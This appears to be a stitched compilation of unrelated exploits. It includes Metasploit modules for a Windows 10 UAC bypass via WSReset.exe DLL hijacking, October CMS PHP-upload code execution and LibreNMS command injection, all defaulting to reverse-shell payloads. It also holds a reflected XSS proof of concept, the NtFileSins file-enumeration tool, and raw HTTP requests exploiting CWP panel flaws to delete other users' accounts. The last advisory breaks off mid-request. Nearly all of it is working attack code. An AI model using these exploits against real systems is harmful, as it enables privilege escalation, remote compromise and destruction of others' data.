##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info = {})
    super(
      update_info( info,
'Name'          => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)',
'Description'   => %q{
        This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool
        is run with the "autoElevate" property set to true, however it can be moved to
        a new Windows directory containing a space (C:\Windows \System32\) where, upon
        execution, it will load our payload dll (propsys.dll).
        },
'License'       => MSF_LICENSE,
'Author'        => [
'ACTIVELabs', # discovery
'sailay1996', # poc
'timwr',      # metasploit module
        ],
'Platform'      => ['win'],
'SessionTypes'  => ['meterpreter'],
'Targets'       => [[ 'Automatic', {} ]],
'DefaultTarget' => 0,
'DefaultOptions' => {
'EXITFUNC'     => 'process',
'WfsDelay'     => 15
        },
'DisclosureDate'  => 'Aug 22 2019',
'Notes'           =>
        {
'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
        },
'References'    => [
          ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'],
          ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'],
          ['URL', 'https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e'],
        ],
      )
    )
  end

  def check
    if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
      return CheckCode::Appears
    end
    CheckCode::Safe
  end

  def exploit
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    end

    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] != payload.arch.first
      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target')
    end

    check_permissions!

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    exploit_win_dir = "C:\\Windows \\"
    exploit_dir = "C:\\Windows \\System32\\"
    exploit_file = exploit_dir + "WSReset.exe"
    unless exists? exploit_win_dir
      print_status("Creating directory '#{exploit_win_dir}'...")
      session.fs.dir.mkdir(exploit_win_dir)
    end
    unless exists? exploit_dir
      print_status("Creating directory '#{exploit_dir}'...")
      session.fs.dir.mkdir(exploit_dir)
    end
    unless exists? exploit_file
      session.fs.file.copy("C:\\Windows\\System32\\WSReset.exe", exploit_file)
    end

    payload_dll = "C:\\Windows \\System32\\propsys.dll"
    print_status("Creating payload '#{payload_dll}'...")
    payload = generate_payload_dll
    write_file(payload_dll, payload)
    print_status("Executing WSReset.exe...")
    begin
      session.sys.process.execute("cmd.exe /c \"#{exploit_file}\"", nil, {'Hidden' => true})
    rescue ::Exception => e
      print_error(e.to_s)
    end
    print_warning("This exploit requires manual cleanup of the '#{exploit_win_dir}' and '#{exploit_dir}' directories!")
  end

  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name' => 'October CMS Upload Protection Bypass Code Execution',
'Description' => %q{
          This module exploits an Authenticated user with permission to upload and manage media contents can
          upload various files on the server. Application prevents the user from
          uploading PHP code by checking the file extension. It uses black-list based
          approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
          Definitions.php:blockedExtensions().
          This module was tested on October CMS version v1.0.412 on Ubuntu.
      },
'Author' =>
        [
'Anti Räis', # Discovery
'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
'SecureLayer7.net' # Metasploit Module
        ],
'License' => MSF_LICENSE,
'References' =>
        [
          ['EDB','41936'],
          ['URL','https://bitflipper.eu/finding/2017/04/october-cms-v10412-several-issues.html'],
          ['CVE','2017-1000119']
        ],
'DefaultOptions' =>
        {
'SSL'     => false,
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'ENCODER' => 'php/base64',
        },
'Privileged' => false,
'Platform'   => ['php'],
'Arch'       => ARCH_PHP,
'Targets' =>
        [
          [ 'October CMS v1.0.412', { } ],
        ],
'DefaultTarget'  => 0,
'DisclosureDate' => 'Apr 25 2017'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base October CMS directory path", '/']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin'])
      ])
  end

  def uri
    return target_uri.path
  end

  def check
    begin
      res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'modules', 'system', 'assets', 'js', 'framework.js')
      })
    rescue
      vprint_error('Unable to access the /assets/js/framework.js file')
      return CheckCode::Unknown
    end

    if res && res.code == 200
      return Exploit::CheckCode::Appears
    end

    return CheckCode::Safe
  end

  def login
    res = send_request_cgi({
'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'),
'method' => 'GET'
    })

    if res.nil?
      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
    end

    /name="_session_key" type="hidden" value="(?<session>[A-Za-z0-9"]+)">/ =~ res.body
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine Session Key") if session.nil?

    /name="_token" type="hidden" value="(?<token>[A-Za-z0-9"]+)">/ =~ res.body
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine token") if token.nil?
    vprint_good("Token for login : #{token}")
    vprint_good("Session Key for login : #{session}")

    cookies = res.get_cookies
    vprint_status('Trying to Login ......')

    res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'),
'cookie' => cookies,
'vars_post' => Hash[{
'_session_key' => session,
'_token' => token,
'postback' => '1',
'login' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
      }.to_a.shuffle]
    })

    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?

    # if we redirect. then we assume we have authenticated cookie.
    if res.code == 302
      print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
      return cookies
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
    end
  end


  def exploit
    cookies = login

    evil = "<?php #{payload.encoded} ?>"
    payload_name = "#{rand_text_alpha(8..13)}.php5"

    post_data = Rex::MIME::Message.new
    post_data.add_part("/", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="path"')
    post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}")  #payload
    data = post_data.to_s

    register_files_for_cleanup(payload_name)
    vprint_status("Trying to upload malicious #{payload_name} file ....")
    res = send_request_cgi({
'uri' => normalize_uri(uri, 'backend', 'cms', 'media'),
'method' => 'POST',
'cookie' => cookies,
'headers' => { 'X-OCTOBER-FILEUPLOAD' => 'MediaManager-manager' },
'Connection' => 'close',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
    })

    send_request_cgi({
'uri' => normalize_uri(uri, 'storage', 'app', 'media', payload_name),
'method' => 'GET'
    })
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'LibreNMS Collectd Command Injection',
'Description'    => %q(
        This module exploits a command injection vulnerability in the
        Collectd graphing functionality in LibreNMS.

        The `to` and `from` parameters used to define the range for
        a graph are sanitized using the `mysqli_escape_real_string()`
        function, which permits backticks. These parameters are used
        as part of a shell command that gets executed via the `passthru()`
        function, which can result in code execution.
      ),
'License'        => MSF_LICENSE,
'Author'         =>
      [
'Eldar Marcussen', # Vulnerability discovery
'Shelby Pace'      # Metasploit module
      ],
'References'     =>
        [
          [ 'CVE', '2019-10669' ],
          [ 'URL', 'https://www.darkmatter.ae/xen1thlabs/librenms-command-injection-vulnerability-xl-19-017/' ]
        ],
'Platform'       => 'unix',
'Arch'           => ARCH_CMD,
'Targets'        =>
      [
        [ 'Linux',
          {
'Platform'        =>  'unix',
'Arch'            =>  ARCH_CMD,
'DefaultOptions'  =>  { 'Payload' => 'cmd/unix/reverse' }
          }
        ]
      ],
'DisclosureDate' => '2019-07-15',
'DefaultTarget'  => 0
    ))

    register_options(
    [
      OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]),
      OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
      OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ])
    ])
  end

  def check
    res = send_request_cgi!('method'  =>  'GET', 'uri'  =>  target_uri.path)
    return Exploit::CheckCode::Safe unless res && res.body.downcase.include?('librenms')

    about_res = send_request_cgi(
'method'  =>  'GET',
'uri'     =>  normalize_uri(target_uri.path, 'pages', 'about.inc.php')
    )

    return Exploit::CheckCode::Detected unless about_res && about_res.code == 200

    version = about_res.body.match(/version\s+to\s+(\d+\.\d+\.?\d*)/)
    return Exploit::CheckCode::Detected unless version && version.length > 1
    vprint_status("LibreNMS version #{version[1]} detected")
    version = Gem::Version.new(version[1])

    return Exploit::CheckCode::Appears if version <= Gem::Version.new('1.50')
  end

  def login
    login_uri = normalize_uri(target_uri.path, 'login')
    res = send_request_cgi('method' =>  'GET',  'uri' =>  login_uri)
    fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200

    cookies = res.get_cookies
    login_res = send_request_cgi(
'method'    =>  'POST',
'uri'       =>  login_uri,
'cookie'    =>  cookies,
'vars_post' =>
      {
'username'  =>  datastore['USERNAME'],
'password'  =>  datastore['PASSWORD']
      }
    )

    fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302

    cookies = login_res.get_cookies
    res = send_request_cgi(
'method'  =>  'GET',
'uri'     =>  normalize_uri(target_uri.path),
'cookie'  =>  cookies
    )
    fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices')

    print_status('Successfully logged into LibreNMS. Storing credentials...')
    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
    login_res.get_cookies
  end

  def get_version
    uri = normalize_uri(target_uri.path, 'about')

    res = send_request_cgi( 'method'  =>  'GET', 'uri' => uri, 'cookie' => @cookies )
    fail_with(Failure::NotFound, 'Failed to reach the about LibreNMS page') unless res && res.code == 200

    html = res.get_html_document
    version = html.search('tr//td//a')
    fail_with(Failure::NotFound, 'Failed to retrieve version information') if version.empty?
    version.each do |e|
      return $1 if e.text =~ /(\d+\.\d+\.?\d*)/
    end
  end

  def get_device_ids
    version = get_version
    print_status("LibreNMS version: #{version}")

    if version && Gem::Version.new(version) < Gem::Version.new('1.50')
      dev_uri = normalize_uri(target_uri.path, 'ajax_table.php')
      format = '+list_detail'
    else
      dev_uri = normalize_uri(target_uri.path, 'ajax', 'table', 'device')
      format = 'list_detail'
    end

    dev_res = send_request_cgi(
'method'    =>  'POST',
'uri'       =>  dev_uri,
'cookie'    =>  @cookies,
'vars_post' =>
      {
'id'              =>  'devices',
'format'          =>  format,
'current'         =>  '1',
'sort[hostname]'  =>  'asc',
'rowCount'        =>  50
      }
    )

    fail_with(Failure::NotFound, 'Failed to access the devices page') unless dev_res && dev_res.code == 200

    json = JSON.parse(dev_res.body)
    fail_with(Failure::NotFound, 'Unable to retrieve JSON response') if json.empty?

    json = json['rows']
    fail_with(Failure::NotFound, 'Unable to find hostname data') if json.empty?

    hosts = []
    json.each do |row|
      hostname = row['hostname']
      next if hostname.nil?

      id = hostname.match('href=\"device\/device=(\d+)\/')
      next unless id && id.length > 1
      hosts << id[1]
    end

    fail_with(Failure::NotFound, 'Failed to retrieve any device ids') if hosts.empty?

    hosts
  end

  def get_plugin_info(id)
    uri = normalize_uri(target_uri.path, "device", "device=#{id}", "tab=collectd")

    res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'cookie' => @cookies )
    return unless res && res.code == 200

    html = res.get_html_document
    plugin_link = html.at('div[@class="col-md-3"]//a/@href')
    return if plugin_link.nil?

    plugin_link = plugin_link.value
    plugin_hash = Hash[plugin_link.split('/').map { |plugin_val| plugin_val.split('=') }]
    c_plugin = plugin_hash['c_plugin']
    c_type = plugin_hash['c_type']
    c_type_instance = plugin_hash['c_type_instance'] || ''
    c_plugin_instance = plugin_hash['c_plugin_instance'] || ''

    return c_plugin, c_type, c_plugin_instance, c_type_instance
  end

  def exploit
    req_uri = normalize_uri(target_uri.path, 'graph.php')
    @cookies = login

    dev_ids = get_device_ids

    collectd_device = -1
    plugin_name = nil
    plugin_type = nil
    plugin_instance = nil
    plugin_type_inst = nil
    dev_ids.each do |device|
     collectd_device = device
     plugin_name, plugin_type, plugin_instance, plugin_type_inst = get_plugin_info(device)
     break if (plugin_name && plugin_type && plugin_instance && plugin_type_inst)
     collectd_device = -1
    end

    fail_with(Failure::NotFound, 'Failed to find a collectd plugin for any of the devices') if collectd_device == -1
    print_status("Sending payload via device #{collectd_device}")

    res = send_request_cgi(
'method'    =>  'GET',
'uri'       =>  req_uri,
'cookie'    =>  @cookies,
'vars_get'  =>
      {
'device'                =>  collectd_device,
'type'                  =>  'device_collectd',
'to'                    =>  Rex::Text.rand_text_numeric(10),
'from'                  =>  "1`#{payload.encoded}`",
'c_plugin'              =>  plugin_name,
'c_type'                =>  plugin_type,
'c_plugin_instance'     =>  plugin_instance,
'c_type_instance'       =>  plugin_type_inst
      }
    )
  end
end

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable Ellipsis human presence technology 2.0.8

Ellipsis human presence technology is prone to a reflected cross-site
scripting vulnerability because it fails to sufficiently sanitize
user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.
To exploit this issue following steps:
The XSS reflected because the value url is not filter correctly:

Demo Request GET:
http://localhost/wordpress/wp-content/plugins/ellipsis-human-presence-technology/inc/protected-forms-table.php?&page=
"%20><script>alert("R1XS4.COM")</script>

from subprocess import Popen, PIPE
import sys,argparse,re

# NtFileSins v2.1
# Fixed: save() logic to log report in case no Zone.Identifiers found.
# Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe shell,
# we can determine existence by compare inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges (not admin to admin).
#               2) artifacts must contain a dot "." or returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message"  OR  "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not required.
#
# Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with user-only rights.
#
#======================================================================#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1   #
# By John Page (aka hyp3rlinx)                                         #
# Apparition Security                                                  #
#======================================================================#

BANNER='''
    _   _______________ __    _____ _           
   / | / /_  __/ ____(_) /__ / ___/(_)___  _____
  /  |/ / / / / /_  / / / _ \\__ \ / / __ \/ ___/
 / /|  / / / / __/ / / /  __/__/ / / / / (__  ) 
/_/ |_/ /_/ /_/   /_/_/\___/____/_/_/ /_/____/  v2.1                                                                                     
 By hyp3rlinx
 ApparitionSec                                                                                                                     
'''

sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"

USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
"Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]

APPDATA_DIR=["AppData/Local/Temp"]

EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat",
".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])

REPORT="NtFileSins_Log.txt"

def usage():
    print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
    print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
    print '-u victim -a "<name.ext>"'
    print "-u victim -d Downloads -a <name.ext> -s"
    print '-u victim -d Contacts -a "Mike N.contact"'
    print "-u victim -a APT.txt -b -n"
    print "-u victim -d -z Desktop/MyFiles -a  <.name>"
    print "-u victim -d Searches -a <name>.search-ms"
    print "-u victim -d . -a <name.ext>"
    print "-u victim -d desktop -a inverted-crosses.mp3 -b"
    print "-u victim -d Downloads -a APT.exe -b"
    print "-u victim -f list_of_files.txt"
    print "-u victim -f list_of_files.txt -b -s"
    print "-u victim -f list_of_files.txt -x .txt"
    print "-u victim -d desktop -f list_of_files.txt -b"
    print "-u victim -d desktop -f list_of_files.txt  -x .rar"
    print "-u victim -z -s -f list_of_files.txt"

def parse_args():
    parser.add_argument("-u", "--user", help="Privileged user target")
    parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search <e.g. Downloads>.")
    parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")
    parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/Temp directory.")
    parser.add_argument("-f", "--artifacts_from_file", nargs="?", help="Enumerate a list of supplied artifacts from a file.")
    parser.add_argument("-n", "--notfound", nargs="?", const="1", help="Display unfound artifacts.")
    parser.add_argument("-b", "--built_in_ext", nargs="?", const="1", help="Enumerate files using NtFileSin built-in ext types, if no extension is found NtFileSins will switch to this feature by default.")
    parser.add_argument("-x", "--specific_ext", nargs="?", help="Enumerate using specific ext, e.g. <.exe> using a supplied list of artifacts, a supplied ext will override any in the supplied artifact list.")
    parser.add_argument("-z", "--zone_identifier", nargs="?", const="1", help="Identifies artifacts downloaded from the internet by checking for Zone.Identifier:$DATA.")
    parser.add_argument("-s", "--save", nargs="?", const="1", help="Saves successfully enumerated artifacts, will log to "+REPORT)
    parser.add_argument("-v", "--verbose", nargs="?", const="1", help="Displays the file access error messages.")
    parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show example usage.")
    return parser.parse_args()


def access(j):
    result=""
    try:
        p = Popen([j], stdout=PIPE, stderr=PIPE, shell=True)
        stderr,stdout = p.communicate()
        result = stdout.strip()
    except Exception as e:
        #print str(e)
        pass
    return result


def artifacts_from_file(artifacts_file, bflag, specific_ext):
    try:
        f=open(artifacts_file, "r")
        for a in f:
            idx = a.rfind(".")
            a = a.strip()
            if a != "":
                if specific_ext:
                    if idx==-1:
                        a = a + specific_ext
                    else:
                        #replace existing ext
                        a = a[:idx] + specific_ext
                if bflag:
                    ARTIFACTS_SET.add(a)
                else:
                    ARTIFACTS_SET.add(a)
        f.close()
    except Exception as e:
        print str(e)
        exit()


def save():
    try:
        f=open(REPORT, "w")
        for j in found_set:
            f.write(j+"\n")
        f.close()
    except Exception as e:
        print str(e)


def recon_msg(s):
    if s == 0:
        return "Access is denied."
    else:
        return "\t[*] Artifact exists ==>"


def echo_results(args, res, x, i):
    global sin_cnt
    if res=="":
        print "\t[!] No NTFS message, you must already be admin, then this script is not required."
        exit()
    if "not recognized as an internal or external command" in res:
        print "\t[!] You must target users with higher privileges than yours."
        exit()
    if res != recon_msg(0):
        if args.verbose:
            print "\t"+res
        else:
            if args.notfound:
                print "\t[-] not found: " + x +"/"+ i
    else:
        sin_cnt += 1
        if args.save or args.zone_identifier:
            found_set.add(x+"/"+i)
        if args.verbose:
            print recon_msg(1)+ x+"/"+i
            print "\t"+res
        else:
            print recon_msg(1)+ x+"/"+i


def valid_artifact_name(sin,args):
    idx = "." in sin
    if re.findall(r"[/\\*?:<>|]", sin):
        print "\t[!] Skipping: disallowed file name character."
        return False
    if not idx and not args.built_in_ext and not args.specific_ext:
        print "\t[!] Warning: '"+ sin +"' has no '.' in the artifact name, this can result in false positives."
        print "\t[+] Searching for '"+ sin +"' using built-in ext list to prevent false positives."
    if not args.built_in_ext:
        if sin[-1] == ".":
            print "\t[!] Skipping: "+sin+" non valid file name."
            return False
    return True


def search_missing_ext(path,args,i):
    for x in path:
        for e in EXTS:
            res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
            echo_results(args, res, x, i+e)


#Check if the found artifact was downloaded from internet
def zone_identifier_check(args):

    global ROOTDIR, internet_sin_cnt
    zone_set.update(found_set)

    for c in found_set:
        c = c + ZONE_IDENTIFIER
        res = access(ROOTDIR+args.user+"/"+c)
        if res == "Access is denied.":
           internet_sin_cnt += 1
           print "\t[$] Zone Identifier found: "+c+" this file was downloaded over the internet!."
           zone_set.add(c)


def ntsins(path,args,i):
    if i.rfind(".")==-1:
        search_missing_ext(path,args,i)
        i=""
    for x in path:
        if i != "":
            if args.built_in_ext:
                for e in EXTS:
                    res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
                    echo_results(args, res, x, i+e)
            elif args.specific_ext:
                idx = i.rfind(".")
                if idx == -1:
                    i = i + "."
                else:
                    i = i[:idx] + args.specific_ext
            res = access(ROOTDIR+args.user+"/"+x+"/"+i)
            echo_results(args, res, x, i)


def search(args):
    print "\tSearching...\n"
    global ROOTDIR, USER_DIRS, ARTIFACTS_SET

    if args.artifact:
        ARTIFACTS_SET = set([args.artifact])

    for i in ARTIFACTS_SET:
        idx = i.rfind(".") + 1
        if idx and args.built_in_ext:
            i = i[:idx -1:None]
        if len(i) > 0 and i != None: 
            if valid_artifact_name(i,args):
                #specific user dir search
                if args.directory:
                    single_dir=[args.directory]
                    ntsins(single_dir,args,i)
                #search appdata dirs
                elif args.appdata:
                    ntsins(APPDATA_DIR,args,i)
                #all default user dirs
                else:
                    ntsins(USER_DIRS,args,i)


def check_dir_input(_dir):
    if len(re.findall(r":", _dir)) != 0:
        print "[!] Check the directory arg, NtFileSins searches under c:/Users/target by default see Help -h."
        return False
    return True


def main(args):

    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)

    if args.examples:
        usage()
        exit()

    if not args.user:
        print "[!] No target user specified see Help -h"
        exit()

    if args.appdata and args.directory:
        print "[!] Multiple search directories supplied see Help -h"
        exit()

    if args.specific_ext:
        if  "." not in args.specific_ext:
            print "[!] Must use full extension e.g. -x ."+args.specific_ext+", dot in filenames mandatory to prevent false positives."
            exit()

    if args.artifact and args.artifacts_from_file:
        print "[!] Multiple artifacts specified, use just -f or -a see Help -h"
        exit()

    if args.built_in_ext and args.specific_ext:
        print "\t[!] Both specific and built-in extensions supplied, use only one."
        exit()

    if args.specific_ext and not args.artifacts_from_file:
        print "\t[!] -x to be used with -f flag only see Help -h."
        exit()

    if args.artifact:
        if args.artifact.rfind(".")==-1:
            print "\t[!] Artifacts must contain a .ext or will result in false positives."
            exit()

    if args.directory:
        if not check_dir_input(args.directory):
            exit()

    if args.artifacts_from_file:
        artifacts_from_file(args.artifacts_from_file, args.built_in_ext, args.specific_ext)

    if not args.artifact and not args.artifacts_from_file:
        print "[!] Exiting, no artifacts supplied see Help -h"
        exit()
    else:
        search(args)

    if sin_cnt >= 1 and args.zone_identifier:
        zone_identifier_check(args)

    if args.save and len(found_set) != 0 and not args.zone_identifier:
        save()
    else:
        if len(zone_set) != 0:
            found_set.update(zone_set)
            save()

    print "\n\tNtFileSins Detected "+str(sin_cnt)+ " out of %s" % str(len(ARTIFACTS_SET)) + " Sins.\n"

    if args.zone_identifier and internet_sin_cnt >= 1:
        print "\t"+str(internet_sin_cnt) + " of the sins were internet downloaded.\n"

    if not args.notfound:
        print "\tuse -n to display unfound enumerated files."
    if not args.built_in_ext:
        print "\tfor extra search coverage try -b flag or targeted artifact search -a."

if __name__ == "__main__":
    print BANNER
    parser = argparse.ArgumentParser()
    main(parse_args())

CVE Number      : CVE-2019-14721, CVE-2019-14722, CVE-2019-14723, CVE-2019-14724, CVE-2019-14725, CVE-2019-14726, CVE-2019-14727, CVE-2019-14728, CVE-2019-14729, CVE-2019-14730

Date                : 24 Jul 2019
Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage     : https://control-webpanel.com/
Software Link       : Not available, user panel only available for lastest version
Product Name    : CWP (CentOS Control Web Panel) 
Version             : 0.9.8.851
Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
Reference        : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE
Attack Requirement  : Authenticated User

-------------------------------------------------------------------------------------------------------------
CVE-2019-14721 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mysql_manager&acc=deleteuserdb HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 31
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_manager
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

user=<TARGET-USER>&host=localhost

-------------------------------------------------------------------------------------------------------------
CVE-2019-14722 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other mail forwarder
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=forwardelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 7
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14723 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other email account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=emaildelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 21
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14724 : CWP (CentOS Control Web Panel 0.9.8.851) Access Other DNS and Delete
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updateforwarders HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 14
Connection: close
